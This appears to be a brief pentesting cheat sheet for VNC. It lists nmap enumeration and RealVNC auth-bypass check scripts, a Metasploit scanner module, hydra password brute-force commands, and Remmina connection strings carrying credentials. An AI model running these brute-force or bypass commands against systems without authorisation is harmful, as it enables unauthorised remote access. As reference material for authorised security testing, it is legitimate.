VNC (Virtual Network Computing) Pentesting
Enumeration
nmap --script vnc-info -p 5900 <target-ip>
# RealVNC authentication bypass (CVE-2006-2369)
nmap --script realvnc-auth-bypass -p 5900 <target-ip>
msf> use auxiliary/scanner/vnc/vnc_none_authBrute Force Credentials
hydra -P passwords.txt vnc://<target-ip>
hydra -P passwords.txt <target-ip> vncConnect
Using Remmina
remmina
remmina -c vnc://<target-ip>
remmina -c vnc://username@vulnerable.com
remmina -c vnc:vulnerable.com?VncUsername=username
remmina -c vnc://username:password@vulnerable.com
remmina -c vnc://vulnerable.com?VncUsername=username\&VncPassword=passwordUsing VNC Viewer
Last updated